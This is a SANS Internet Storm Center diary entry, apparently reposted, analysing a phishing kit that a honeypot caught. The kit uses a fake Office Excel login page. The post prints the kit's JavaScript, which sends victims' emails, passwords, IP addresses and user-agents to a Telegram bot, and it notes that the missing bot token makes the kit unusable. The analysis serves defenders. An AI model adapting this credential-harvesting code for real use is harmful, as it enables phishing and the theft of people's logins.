From Phishing Kit To Telegram… or Not!, (Mon, Mar 20th)


Phishing kits are not new, they are plenty in the wild, and my honeypot collects many samples daily. Usually, a phishing kit will collect credentials and send them to a compromised server (WordPress is generally an excellent target to host this kind of malicious code). Later, I found many kits that (ab)use online services to receive data submitted via HTTP forms[1].

Today, I spotted a phishing campaign that stores collected credentials via a Telegram bot! Telegram bots are common in malicious Python scripts but less common in Phishing campaigns! The fake login page is pretty simple:

Everything happens through a piece of JavaScript code:

    document.getElementById("submitBtn").addEventListener("click", function(e) {
    var pswd = document.getElementById('password').value;
    if (pswd == null || pswd == ""){
        document.getElementById('msg').innerHTML = `
Your account password cannot be empty. if you don't remember your password, reset it now.
        setTimeout(() => {document.getElementById('msg').innerHTML = '';}, 3000);}
    else if(pswd.length < 5){
        document.getElementById('msg').innerHTML = '
Your account password is too short.
        setTimeout(() => {document.getElementById('msg').innerHTML = ''; document.getElementById("submitBtn").reset();}, 3000);
    } else {
        var IP = document.getElementById('gfg').textContent;
        var message = `====== Office Excel ======rnEmail: ${email}rnPassword: ${pswd}rnIP:${IP}rnUser-Agent: ${navigator.userAgent}rn===================`;
        var settings = {
            "async": true, "crossDomain": true, "url": "" + token + "/sendMessage",
            "method": "POST", "headers": {"Content-Type": "application/json", "cache-control": "no-cache"},
            "data": JSON.stringify({"chat_id": chat_id, "text": message})}
             $.ajax(settings).done((response) => {
             document.getElementById("password").value ="";
             document.getElementById('msg').innerHTML = `
Your account or password is incorrect. if you don't remember your password, reset it now.
             setTimeout(() => {document.getElementById('msg').innerHTML = '';}, 3000);

If the victim provides a password, interesting data are posted to a Telegram bot (credentials, IP, User-Agent) via a simple HTTP request built in JavaScript. However, the script has a big issue. A token is required to “talk” to the Telegram bot (see in red above). But, the token was not defined in the script, making it unusable! Yes, attackers make mistakes too!

[Note] This technique is not new, and was already covered in another diariy by Johannes[2] but the code is different here and the big mistake is funny!


Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Alex Post